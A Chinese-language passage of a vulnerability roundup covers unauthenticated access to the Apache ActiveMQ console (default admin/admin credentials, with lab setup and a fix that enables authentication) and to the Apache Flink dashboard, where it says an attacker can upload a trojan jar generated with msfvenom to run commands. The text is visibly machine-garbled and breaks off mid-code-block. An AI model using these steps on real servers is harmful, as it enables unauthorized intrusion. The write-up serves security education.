未授权毛病大赏

ActiveMQ未授权访问毛病

毛病形貌

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ管理控制台的默认管理用户名和密码分别为admin和admin，用户可以未经授权使用默认凭据直接访问服务器，导致敏感信息泄露，并进一步举行攻击。
环境搭建

Download: http://archive.apache.org/dist/activemq/apache-activemq/5.5.0/apache-activemq-5.5.0-bin.tar.gz

1. [root@localhost bin]# ./activemq start
2. INFO: Using default configuration
3. (you can configure options in one of these file: /etc/default/activemq /root/.activemqrc)
5. INFO: Invoke the following command to create a configuration file
6. ./activemq setup [ /etc/default/activemq | /root/.activemqrc ]
8. INFO: Using java '/usr/bin/java'
9. INFO: Starting - inspect logfiles specified in logging.properties and log4j.properties to get details
10. INFO: pidfile created : '/tmp/apache-activemq-5.5.0/data/activemq.pid' (pid '2173')

复制代码

Vulnerability Reproduction

直接访问：http://192.168.32.183:8161/admin/queues.jsp
修复方案

编辑 ${ACTIVEMQ_HOME}/conf/jetty.xml开启身份验证，将authenticate属性改为true：

1. <property name="authenticate" value="true" />

复制代码

编辑文件conf/jetty-realm.properties来更改Apache ActiveMQ的默认管理用户名和密码，格式如下：
重启服务就可以举行鉴权
Apache Flink未授权访问毛病

毛病形貌

Apache Flink Dashboard默认没有用户权限认证，攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包，可长途执行恣意体系命令获取服务器权限。
环境搭建

测试版本：flink-1.15.1
修改flink-1.15.1/confflink-conf.yaml，将8081端口开启。
启动flink

1. start-cluster.sh

复制代码

毛病使用

访问web页面。
使用msfovenom生成rce.jar
[code]┌──(root